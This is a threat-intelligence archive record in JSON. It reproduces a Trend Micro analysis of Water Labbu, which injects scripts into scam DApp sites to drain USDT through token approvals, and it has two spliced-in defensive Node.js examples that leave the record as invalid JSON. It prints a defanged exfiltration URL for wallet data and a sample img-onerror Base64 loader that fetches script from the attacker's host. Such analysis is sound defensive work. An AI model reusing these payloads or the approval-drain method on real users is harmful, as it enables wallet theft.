{
	"id": "761ef62f-589b-4cd6-ad1f-16d42a72e4d6",
	"created_at": "2026-04-06T00:13:22.518095Z",
	"updated_at": "2026-04-10T13:11:23.908176Z",
	"deleted_at": null,
	"sha1_hash": "d86c57124b79e83d324b68b7f4e229632484a5a5",
	"title": "Water Labbu Abuses Malicious DApps to Steal Cryptocurrency",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1777121,
	"plain_text": "Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\r\nBy: Joseph C Chen, Jaromir Horejsi | Oct 03, 2022 | Read time: 6 min (1666 words)\r\nPublished: 2022-10-03 · Archived: 2026-04-05 15:10:59 UTC\r\nCyber Crime\r\nThe parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\r\nWe discovered a threat actor we named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method, obtaining access permissions and token allowances from their victims’ wallets, unlike other similar campaigns, they did not use any kind of social engineering — at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.\r\nIn a parasitic manner, the threat actor compromised the websites of other scammers posing as a decentralized application (DApp) and injected malicious JavaScript code into them. The techniques used by the original scammers are detailed in an alert released by law enforcement agencies.\r\nWhen the threat actor finds a victim who has a large amount of cryptocurrency stored in a wallet that is connected to one of the scam websites, the injected JavaScript payload sends a request for permissions. 
The request is disguised to look like it was sent from the compromised website and asks for permission (a token allowance) to transfer a nearly unlimited amount of USD Tether (USDT, a stablecoin pegged 1:1 to the US dollar) from the target’s wallet.\r\nWater Labbu’s targets are led to believe that the request was issued by the DApp itself, which may lead them to skip a thorough review of the permission’s details. However, the granted permission does not go to the crypto addresses of the original scammer, but to another address controlled by Water Labbu. The threat actor can then use the obtained permission to drain all USDT funds from the victim’s wallet.\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 1 of 8\r\nFigure 1. The Water Labbu attack flow\r\nAs of the time of writing, we found 45 fraudulent cryptocurrency-related DApp websites that have been compromised by Water Labbu. These websites show similar styles and themes to the websites used in the “Lossless Mining Liquidity Pledge Free” scams.\r\nUpon checking the transaction records of the threat actor’s addresses on the Ethereum blockchain, we discovered that they have successfully stolen funds from at least nine different victims for a total amount of at least 316,728 USDT.\r\nIn the following sections, we share how the actor used injected JavaScript code to hijack cryptocurrency from fraudulent DApp websites, as well as additional findings that hint at how they may have compromised the scammers.\r\nFigure 2. 
Screenshot of a compromised fraudulent DApp website\r\nAnalyzing the cryptocurrency theft routine\r\nAs we mentioned in the introduction, Water Labbu’s modus operandi involves compromising scam DApp websites and injecting their JavaScript payload into them. The DApp websites seem to be built from some form of custom template, where the messages displayed in an announcement box are received in JSON format by sending an HTTP request to a given URL. The content returned for that request (Figure 3) shows a JSON object with a “helper” key containing a few embedded items. The first item is clearly injected and contains an evaluation of a Base64-encoded script.\r\nFigure 3. Visual example of an announcement box from a scam DApp website\r\nFigure 4. Displayed data received in JSON format\r\nIn one of the cases we analyzed, Water Labbu injected an IMG tag that loads a Base64-encoded JavaScript payload through its “onerror” event, a known XSS evasion technique used to bypass Cross-Site Scripting (XSS) filters. The injected payload then creates another script element that loads a further script from the delivery server tmpmeta[.]com. 
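As an added example (not code from the Trend Micro post), the following Node.js script scans an announcement object of the shape described above and flags items that carry an injected loader: an inline event handler such as onerror, or an atob(...) argument, which it decodes to recover the stage-0 body and the hosts it loads scripts from. The 'helper' key and the img-onerror plus eval(atob(...)) loader follow the post; the item field name 'text', the sample announcement items and the stage-0 body are constructed for this example, and the delivery host is kept defanged as tmpmeta[.]com.

```javascript
// Added example, not code from the Trend Micro post. Scans the announcement
// JSON a template-built scam DApp site fetches and flags entries carrying an
// injected script loader. The 'helper' key and the img-onerror + eval(atob())
// loader follow the post; the 'text' field, the sample items and the stage-0
// body are constructed here, and the delivery host is kept defanged.

// Constructed stage-0 body: what the injected Base64 blob decodes to.
const STAGE0 = `var s=document.createElement('script');` +
  `s.src='https://tmpmeta[.]com/a.js';document.head.appendChild(s);`;

// Constructed announcement object as the site's front end would receive it.
const ANNOUNCEMENT = {
  helper: [
    { text: `<img src=x onerror=eval(atob('` +
            Buffer.from(STAGE0).toString('base64') + `'))>` },
    { text: 'Lossless mining pool: pledge USDT, daily rewards 3%' },
    { text: `<a href='https://example.invalid/rules'>Pool rules</a>` },
  ],
};

const EVENT_HANDLERS = ['onerror', 'onload', 'onmouseover', 'onfocus'];
// Quote characters a loader may wrap its argument in (single, double, backtick).
const QUOTES = [String.fromCharCode(39), String.fromCharCode(34), '`'];

// Return the Base64 argument of the first atob('...') call, or null.
function atobArgument(html) {
  const start = html.indexOf('atob(');
  if (start < 0) return null;
  const quote = html[start + 5];
  if (!QUOTES.includes(quote)) return null;
  const end = html.indexOf(quote, start + 6);
  return end < 0 ? null : html.slice(start + 6, end);
}

// Hosts assigned to a .src property in decoded loader code.
function scriptHosts(js) {
  const hosts = [];
  for (let i = js.indexOf('.src='); i >= 0; i = js.indexOf('.src=', i + 1)) {
    const quote = js[i + 5];
    const end = QUOTES.includes(quote) ? js.indexOf(quote, i + 6) : -1;
    if (end < 0) continue;
    const afterScheme = js.slice(i + 6, end).split('//')[1];
    if (afterScheme) hosts.push(afterScheme.split('/')[0]);
  }
  return hosts;
}

// Scan every helper item and report the ones that look injected.
function findInjectedLoaders(announcement) {
  const findings = [];
  (announcement.helper || []).forEach((item, index) => {
    const html = String(item.text || '');
    const lower = html.toLowerCase();
    const hasHandler = EVENT_HANDLERS.some((h) => lower.includes(h + '='));
    const hasEval = lower.includes('eval(') || lower.includes('<script');
    const b64 = atobArgument(html);
    if (!hasHandler && !hasEval && b64 === null) return;
    const decoded = b64 === null ? null : Buffer.from(b64, 'base64').toString('utf8');
    findings.push({
      index,
      reason: hasHandler ? 'inline event handler' : 'script evaluation',
      decoded,
      hosts: decoded === null ? [] : scriptHosts(decoded),
    });
  });
  return findings;
}

console.log(JSON.stringify(findInjectedLoaders(ANNOUNCEMENT), null, 2));
```

Run it with node and the first helper item is reported with its decoded stage-0 body and the host tmpmeta[.]com; the two benign items pass. A check like this belongs wherever the announcement JSON is produced or stored, since the front end will happily render whatever the template server returns.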
The delivery server then filters victims and delivers different content based on the IP address and the browser User-Agent header (which is used to help determine the victim’s environment).\r\nWe noticed the following behavior:\r\nIf the victim loads the script from a mobile device using Android or iOS, it returns the first-stage script with cryptocurrency-theft capabilities.\r\nIf the victim loads the script from a desktop running Windows, it returns another script showing a fake Flash update message asking the victim to download a malicious executable file.\r\nIt’s worth mentioning that the delivery server implements a mechanism to avoid serving the script multiple times to the same IP address over a short period. If an IP address accessed the delivery server in the last few hours, or the victim’s device type does not match the other required conditions, it returns a simple stealer script that collects cookie and LocalStorage data and sends them back to the delivery server.\r\nFigure 5. Stealer script that collects cookie and LocalStorage data\r\nThe cryptocurrency-stealing script: first stage\r\nInitially, the web3.js library is loaded. This gives the first-stage script the ability to connect to the victim’s wallet, although the malicious script communicates with the wallet only if the victim has connected it to the compromised DApp website. Gaining access to the wallet allows Water Labbu to gather the target’s Ethereum address and balance. The script also interacts with the Tether USD smart contract to read the victim’s USDT balance. 
If the wallet contains more than 0.001 ETH or more than 1 USDT, it sends the wallet balance information and the wallet address to the information-collecting server, linkstometa[.]com, via an HTTP request.\r\nThe following text shows the request to exfiltrate the wallet balance:\r\nhxxps[:]//linkstometa[.]com/data/?get\u0026s=[%22{ETH balance}%22,%22{USDT balance}%22]\u0026j={Ethereum address}\r\nFigure 6. Script for collecting wallet balance and the default wallet address (deobfuscated)\r\nThe cryptocurrency-stealing script: second stage\r\nThe exfiltration request returns the second-stage script only when the reported balances exceed both thresholds: more than 0.005 ETH and more than 22,000 USDT. Otherwise, it returns an empty payload and leaves the victim to the other scammers. The second-stage script performs a third balance check and then requests the token allowance approval.\r\nFigure 7. The script responsible for showing the token allowance approval\r\nThe token approval request asks victims to grant a given address permission to complete transactions and spend cryptocurrency assets on their behalf. The malicious script requests an approval limit of 10^32 USDT, which is far more than the total USDT in existence on the blockchain. When the “approve” request is issued, the cryptocurrency wallet application asks the user to review the details of the request before confirming. If the victim does not carefully check the request details and grants the permission to Water Labbu’s address, the threat actor is able to transfer all the USDT from the victim’s wallet.\r\nFigure 8. 
The review prompt for the malicious permission requests by the cryptocurrency wallet\r\nAnalysis of the blockchain transactions\r\nDuring our monitoring of Water Labbu’s operations, we noticed two addresses being repeatedly used to receive the granted permissions and to transfer the victims’ cryptocurrency assets.\r\nThe first address, 0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a, receives the token approvals from victims. As of August 2022, the address has successfully used the “Transfer From” method seven times to collect USDT from different addresses, likely belonging to the group’s victims. Funds were then transferred to the second address, 0x3e9f1d6e244d773360dce4ca88ab3c054f502d51. The second address has two transactions transferring stolen USDT to two other addresses: 0x486d08f635b90196e5793725176d9f7ead155fed and 0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf.\r\nThe address 0xfece995f99549011a88bbb8980bbedd8fada5a35 is a newer one we found inside Water Labbu’s scripts from June 2022. This address successfully drained USDT from two addresses and swapped the funds on the Uniswap cryptocurrency exchange — first to USD Coin (USDC), then to ETH — before finally sending the ETH to the Tornado Cash mixer.\r\nAs of August 2022, the total amount of USDT drained by Water Labbu from nine victims amounts to 316,728 USDT.\r\nFigure 9. Diagram showing the transactions of stolen USDT\r\nAnalysis of the fake Flash infection chain\r\nWhen a target visits the compromised DApp websites using a Windows desktop, the delivery server, tmpmeta[.]com, returns a different script that tries to steal cookie and LocalStorage data. It also loads additional scripts from other delivery servers such as whg7[.]cc and r8s[.]cc. 
The delivery server r8s[.]cc returned the final-stage script, which creates a fake Flash installation message overlay on the compromised websites. The message, which is in simplified Chinese, states that Flash Player support ended on September 14, 2020, and that downloading the latest version is needed to continue viewing the page.\r\nFigure 10. The script loading sequence on a Windows desktop system\r\nFigure 11. The fake Flash Player installation message overlaid on the compromised website\r\nThe download link in the overlay does not point to the legitimate installer. Unsurprisingly, it redirects victims to a download of another file, flashupdate_v_3.10.exe, hosted in the GitHub repository “flashtech9/Flash.” The downloaded file is an installer of a software product called Third Eye, an employee monitoring software developed by the Chinese company Yangzhou Third Eye Software Technology.\r\nFigure 12. The list of files available for download from the GitHub repository “flashtech9/Flash”\r\nConclusion\r\nWater Labbu has managed to steal cryptocurrency funds by injecting their malicious scripts into the fraudulent websites of other scammers, showing a willingness to exploit the methods of other malicious actors for their own ends. Fortunately, traditional security best practices are still applicable in this situation and can help users avoid the group’s schemes.\r\nUsers should be wary of any invitation to invest that originates from an untrusted party. Furthermore, they should not trade cryptocurrency funds on any unknown platform without thoroughly vetting its legitimacy and understanding what it does and how it operates. 
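As an added example (not code from the Trend Micro post), the following Node.js script shows what a careful review of an approve request amounts to: it decodes the calldata of an ERC-20 approve() call the way a wallet review prompt should, and flags the two things the victims described above missed, a spender that is not the DApp contract they believe they are authorising and an allowance that no real balance could justify. The approve/transferFrom/transfer selectors are the standard ERC-20 ones and the spender 0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a is the receiving address named in the transaction analysis; the expected DApp contract DAPP_SPENDER, the victim balance of 25,000 USDT and the one-trillion-token 'unlimited' threshold are constructed assumptions.

```javascript
// Added example, not code from the Trend Micro post. Decodes ERC-20 approve()
// calldata the way a wallet review prompt should and flags a spender that is
// not the expected DApp contract or an allowance that no balance justifies.
// Selectors are standard ERC-20; the Water Labbu spender is from the post;
// DAPP_SPENDER, BALANCE_RAW and UNLIMITED_RAW are constructed assumptions.

const SELECTORS = {
  '0x095ea7b3': 'approve(address,uint256)',
  '0x23b872dd': 'transferFrom(address,address,uint256)',
  '0xa9059cbb': 'transfer(address,uint256)',
};

const USDT_DECIMALS = 6n;
// Constructed threshold: more than a trillion tokens is effectively unlimited
// (the post reports approvals for 10^32).
const UNLIMITED_RAW = 10n ** 12n * 10n ** USDT_DECIMALS;

const WATER_LABBU_SPENDER = '0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a'; // from the post
const DAPP_SPENDER = '0x1111111111111111111111111111111111111111';       // constructed
const BALANCE_RAW = 25000n * 10n ** USDT_DECIMALS;                       // constructed: 25,000 USDT

const pad32 = (hex) => hex.padStart(64, '0');

// ABI-encode approve(spender, amount): selector + two 32-byte words.
function encodeApprove(spender, amountRaw) {
  return '0x095ea7b3' + pad32(spender.slice(2).toLowerCase()) + pad32(amountRaw.toString(16));
}

// Split calldata into selector and 32-byte words, then decode known calls.
function decodeCalldata(data) {
  const hex = data.toLowerCase();
  if (!/^0x[0-9a-f]+$/.test(hex) || (hex.length - 10) % 64 !== 0) {
    throw new Error('malformed calldata');
  }
  const words = [];
  for (let i = 10; i < hex.length; i += 64) words.push(hex.slice(i, i + 64));
  const name = SELECTORS[hex.slice(0, 10)] || null;
  const addr = (w) => '0x' + w.slice(24); // last 20 bytes of the padded word
  if (name === 'approve(address,uint256)' && words.length === 2) {
    return { name, spender: addr(words[0]), amountRaw: BigInt('0x' + words[1]) };
  }
  if (name === 'transferFrom(address,address,uint256)' && words.length === 3) {
    return { name, from: addr(words[0]), to: addr(words[1]), amountRaw: BigInt('0x' + words[2]) };
  }
  return { name, words };
}

// The review a wallet prompt should present: who may spend, and how much.
function reviewApprove(data, expectedSpender, balanceRaw) {
  const call = decodeCalldata(data);
  const flags = [];
  if (call.name !== 'approve(address,uint256)' || call.spender === undefined) {
    return { call, flags: ['not an approve call'] };
  }
  if (call.spender !== expectedSpender.toLowerCase()) flags.push('spender is not the DApp contract');
  if (call.amountRaw >= UNLIMITED_RAW) flags.push('effectively unlimited allowance');
  else if (call.amountRaw > balanceRaw) flags.push('allowance exceeds current balance');
  return { call, flags };
}

// Constructed requests: the injected script's 10^32 approve to Water Labbu's
// address, and a bounded approve to the DApp contract a user would expect.
const MALICIOUS = encodeApprove(WATER_LABBU_SPENDER, 10n ** 32n);
const LEGIT = encodeApprove(DAPP_SPENDER, 1000n * 10n ** USDT_DECIMALS);

for (const data of [MALICIOUS, LEGIT]) {
  const r = reviewApprove(data, DAPP_SPENDER, BALANCE_RAW);
  console.log(r.call.spender, (r.call.amountRaw / 10n ** USDT_DECIMALS).toString() + ' USDT', r.flags);
}
```

The spender check is the one that defeats this campaign: the approve is issued from the scam site, so the token and the amount look like what the site asked for, and only the spender address betrays that the allowance goes to Water Labbu rather than the site's own contract.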
We suggest that users review the parameters of transactions (token approval limits) and ensure that they have not been modified or issued by an untrusted party.\r\nIn the next blog entry, we are going to share our additional findings related to Water Labbu’s infection chains, which include their successful exploitation techniques and the patching of an ElectronJS-based application used by scammer\r\nIndicators of Compromise\r\nThe indicators of compromise for this blog entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html"
	],
	"report_names": [
		"water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html"
	],
	"threat_actors": [
		{
			"id": "2128689c-108c-4d66-b551-de8e4fcf8653",
			"created_at": "2023-11-14T02:00:07.084086Z",
			"updated_at": "2026-04-10T02:00:03.445971Z",
			"deleted_at": null,
			"main_name": "Water Labbu",
			"aliases": [],
			"source_name": "MISPGALAXY:Water Labbu",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434402,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d86c57124b79e83d324b68b7f4e229632484a5a5.pdf",
		"text": "https://archive.orkl.eu/d86c57124b79e83d324b68b7f4e229632484a5a5.txt",
		"img": "https://archive.orkl.eu/d86c57124b79e83d324b68b7f4e229632484a5a5.jpg"
	}
}